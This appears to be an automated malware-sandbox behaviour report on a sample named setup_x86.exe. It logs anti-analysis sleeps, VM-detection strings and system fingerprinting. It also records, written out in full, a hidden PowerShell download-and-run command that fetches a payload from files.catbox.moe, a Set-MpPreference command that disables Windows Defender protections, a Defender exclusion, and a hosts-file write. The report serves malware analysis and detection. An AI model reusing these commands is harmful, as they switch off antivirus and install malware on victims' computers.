Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5552	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99890s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99781s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99672s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99562s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99453s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99343s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99234s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99125s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -99015s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -98906s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -98788s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -98672s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe TID: 5256	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3472	Thread sleep count: 6617 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5948	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060	Thread sleep count: 3095 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 2074 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7144	Thread sleep count: 849 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2744	Thread sleep count: 4028 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5564	Thread sleep count: 571 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2812	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340	Thread sleep count: 4370 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 340	Thread sleep count: 534 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2788	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99890	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99781	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99672	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99562	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99453	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99343	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99234	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99125	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 99015	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 98906	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 98788	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	Binary or memory string: vboxtray
Source: setup_x86.exe.0.dr	Binary or memory string: vboxservice
Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	Binary or memory string: qemu-ga
Source: setup_x86.exe.0.dr	Binary or memory string: vmwareuser
Source: setup_x86.exe, 00000003.00000000.2193561820.000001F316942000.00000002.00000001.01000000.00000007.sdmp, 8mzJ3.scr.3.dr, setup_x86.exe.0.dr	Binary or memory string: vmusrvc
Source: setup_x86.exe.0.dr	Binary or memory string: vmwareservice+discordtokenprotector
Source: setup_x86.exe.0.dr	Binary or memory string: vmsrvc
Source: setup_x86.exe.0.dr	Binary or memory string: vmtoolsd
Source: setup_x86.exe.0.dr	Binary or memory string: vmwaretray
Source: powershell.exe, 00000000.00000002.2216227765.0000017D74180000.00000004.00000020.00020000.00000000.sdmp, setup_x86.exe, 00000003.00000002.2831488374.000001F316AF5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Downloads\setup_x86.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'			Jump to behavior

Modifies Windows Defender protection settings

Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Downloads\setup_x86.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Downloads\setup_x86.exe "C:\Users\user\Downloads\setup_x86.exe"	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Downloads\setup_x86.exe'	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-WmiObject -Namespace "Root\SecurityCenter2" -Class AntiVirusProduct \| Select-Object -ExpandProperty displayName	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri https://files.catbox.moe/l2rczc.pif -outfile $env:userprofile\downloads\setup_x86.exe; start-process $env:userprofile\downloads\setup_x86.exe }"
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2
Source: C:\Users\user\Downloads\setup_x86.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Users\user\Downloads\setup_x86.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Downloads\setup_x86.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
